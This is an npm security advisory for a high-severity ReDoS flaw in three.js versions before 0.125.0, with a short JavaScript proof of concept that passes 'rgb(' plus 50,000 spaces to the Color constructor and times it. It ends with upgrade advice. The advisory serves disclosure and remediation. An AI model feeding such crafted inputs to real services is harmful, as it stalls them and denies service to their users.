Severity: high

    Regular Expression Denial of Service

    three

    Overview

    three before version 0.125.0 is vulnerable to Regular Expression Denial of Service (ReDoS). This can happen when handling rgb or hsl colors.

    POC

    var three = require('three')
    
    function build_blank (n) {
     var ret = "rgb("
     for (var i = 0; i < n; i++) {
      ret += " "
     }
    
     return ret + "";
    }
    
    var Color = three.Color
    
    var time = Date.now();
    new Color(build_blank(50000))
    var time_cost = Date.now() - time;
    console.log(time_cost+" ms")
    

    Remediation

    Upgrade to version 0.125.0 or later

    Have content suggestions? Visit npmjs.com/support.

    Advisory timeline

    1. published

      Advisory Published
      Mar 1st, 2021
    2. reported

      Reported by Anonymous
      Mar 1st, 2021